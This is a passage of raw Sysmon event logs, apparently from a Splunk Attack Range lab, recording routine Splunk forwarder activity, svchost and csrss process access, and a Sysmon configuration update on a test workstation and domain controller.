07:52:28.225{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807631Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:28.225{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F4BC-60EB-7979-00000000D001}3352C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807630Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:28.225{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F4BC-60EB-7979-00000000D001}3352C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807629Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:28.210{0C1E0330-F4BC-60EB-7979-00000000D001}3352C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001048934Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:29.460{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4720672E689047AA3F306C372AF5BA11,SHA256=96C4F70478F8AAA7B074AB1FA5D643D4A969285E3E7A53ADEB8BC5E161F481D7,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000807644Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:29.225{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6BF0744DC6E2E413A11A7B3E73DB67E6,SHA256=25E9D2B10FD4E5BCA03DBB1167EE701558C9BBCAB3FC0346D9DA551EDEE08C09,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807646Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:30.225{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=19BD5F175351DA0F4743D4CE3D2F354B,SHA256=EBACCBE2BD956BF44129A80787B56E3F1D60DD5B49F7E7E16FB631708B0BBF96,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048935Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:30.490{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=256638E03BEEB4327FF6376BEC378A6B,SHA256=A6C44C23202A685632672DF0BEB601B0EC28E6D3EE61328053BBC4B61098A23E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807645Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:30.085{0C1E0330-0490-60E8-1200-00000000D001}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=D7E7E54F32543E0176A7ED2939C6F8E3,SHA256=E6371F6F99617BAF1DC9525ACBC8E224474E17754CAB4369938C08A161DF552B,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000807647Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:31.225{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=235A634DD587A5CF6BBD212BF8D29A16,SHA256=A29BB6F8965B1C6511612FB481529062BD76D5719B5AD0717E6A2B22E4AB656E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048936Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:31.505{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90A63B6AEF852F4BEF63C64FBEB1D49C,SHA256=8E4C37C633EC334B5F03A2BD8C005D234010E63D91D5011E6C93A1870E9BCFA2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048945Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:32.520{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=659B5E8A1F48F3D8DEF1C727C2323F71,SHA256=7AC2C7EA6F26B1655D3E84A0B35B948FDFE8F3BCB8E12F18778960130DE14D86,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807648Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:32.257{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=523D6846139339CCCBDCDA35C671BAE5,SHA256=B0FB3AB2E8EA7F1774862EFEDC5B3B53B9179F817BE82F5735426CF65243BF7C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048944Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:32.005{466BC892-F49A-60EB-327D-00000000CF01}61886504C:\Windows\system32\conhost.exe{466BC892-F4C0-60EB-357D-00000000CF01}9832C:\Program Files\ansible\sysmon\Sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048943Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:32.005{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048942Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:52:32.005{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048941Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:32.005{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048940Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:52:32.005{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048939Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:32.005{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F4C0-60EB-357D-00000000CF01}9832C:\Program Files\ansible\sysmon\Sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048938Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:32.005{466BC892-F49A-60EB-317D-00000000CF01}95726844C:\Windows\system32\cmd.exe{466BC892-F4C0-60EB-357D-00000000CF01}9832C:\Program Files\ansible\sysmon\Sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+1ace3|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
154100x80000000000000001048937Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:32.009{466BC892-F4C0-60EB-357D-00000000CF01}9832C:\Program Files\ansible\sysmon\Sysmon64.exe13.01System activity monitorSysinternals SysmonSysinternals - www.sysinternals.com-Sysmon64.exe -c C:\Program Files\ansible\sysmon\ATTACKRANGE\Administrator{466BC892-F49A-60EB-D4CC-F90400000000}0x4f9ccd43HighMD5=8A914CFB7496B8461285C009DD8F5627,SHA256=422EC998FED690C2EC3239A4BB80075F098A9A95CBDFFBC873365B9F7136A02A,IMPHASH=DCF866F4139DD7FF6C0A5D4FA050CD7A{466BC892-F49A-60EB-317D-00000000CF01}9572C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" 23542300x80000000000000001048948Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:33.556{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB6F941B59D9F7AC2E1020CAB6E5177A,SHA256=76BB53234D2370814A2894204EA98B12BEFC0A9B02FDCE869BE46E382BF3BE08,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807649Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:33.288{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45803EB7FEF30E017866FC2E13E33671,SHA256=83B5B9BBA7963CD1EE97BED38213F0730A3DF945129E2B7428264CD672C61748,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048947Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:33.020{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=73179C9BA02E8C58340C323FE61FA6AD,SHA256=A3028DB1E19215F04DD254A2FEF19B2D30DB79B5135FEAE673CAB3FB88D7C471,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048946Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:33.020{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=50CFF4EC02B6203CB7198A0A22D4E307,SHA256=9E75E42E23106A254D05E1CB6221696996C713F8BA3C4F19F63D0B0C7104B461,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048950Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:25.801{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51026-false10.0.1.12-8000- 23542300x80000000000000001048949Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:34.572{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2328325E34854A2C46454686890F9E87,SHA256=17DC8DAACD919F842C817563512D357AF47EE9B512B436A7F947B8218A800A4E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807651Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:34.318{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9D0BCAF977E448D18D4FB9B81DB8D8E,SHA256=E0460C7F8DC1A683FAFDD4F73CAF09CF686E3E5786D49B424074AA0E05AECF9B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807650Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:32.248{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57268-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001048951Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:35.586{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A57410378C882CFF04FC46C5DA660A57,SHA256=9ACCC467ED570A4177077D3B57F1CA1DFEC1E9B009ACE60000B069333DB811E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807652Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:35.334{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38F30DA1F9268E78264E169769768CD3,SHA256=8AC96768DDF58B0F3ED4900F0110FB5C07E90F1C48D206D247B48859D93466CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048952Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:36.601{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=09441381AFF44DE74878362B2C9A87D8,SHA256=24E21F6387B59AAB1871E8E0E1D4EDAF42A8396DAAB4FE09D4B3CE0CE493FC95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807653Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:36.381{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D4B7F1579094687D7D567FB0B01BDBE5,SHA256=BCC4610EF0529AC52BB2D1CACE5AD2BE5E4E603E37CE1D3FFD6C8A08900C62B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048953Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:37.601{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C25B1DFDB9FCD98371CAED663584D39,SHA256=B824ED532F638DC64F0886FB5F7CEB7AF5C5A3DA18ECDDBCBB32815AD0864B30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807654Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:37.396{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36237E17A116310C3C8AB20947B4C65F,SHA256=6AA363DB318AB30F52B964ECFCF01AB8BC5D404C36C90CCE1FCF1ADDF97B16B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048955Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:38.634{466BC892-02CE-60E8-7600-00000000CF01}3400NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F91F179492DA45599BB6C2B7EAB9578,SHA256=FA14948006DC83A16BA6293F3DCFE52D53B8B466D87534987926705B9172AB48,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807655Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:38.396{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1117322D95BDEE7BCB71DC43FF3F936F,SHA256=1892930012CF93C1A79A88766631062B71ED2E72D02E460A5595E90156E3C3FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048954Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:38.532{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=6A270DA360F186BD054824654D53D6B0,SHA256=6CF8063193538C5BBFF20BADC21B34D718FC7B60D7F434FBC360AB3A3672CB78,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048957Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:39.668{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B936F49C112C5C4FE28B96B89723DD9,SHA256=790FBB60E3A66F63D6683737F879532ED0EDFC2C88CACCDBACCD4B31EF8C70AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807656Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:52:39.412{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82612FA0914D63810D27C779D6BA031B,SHA256=C57828721F39915D9827562E222D90CBE4919B0741BC29950887234CC4C9D35B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048956Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:31.797{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51027-false10.0.1.12-8000- 23542300x80000000000000001048958Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:40.699{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28EE782CCCD1ACC2CE6E9F61A631FFAD,SHA256=D5376A4C6178EBFBED86FFBB6F4C482377BB77F255DD18AB97A590A3933B8026,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807658Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:40.443{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AAD7FD5EB9522D3EED3DAD55DF9E6B86,SHA256=211907A7142083CE44665945527FCDAF290DE349453687822085FC3CEC74DB60,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807657Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:38.247{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program 
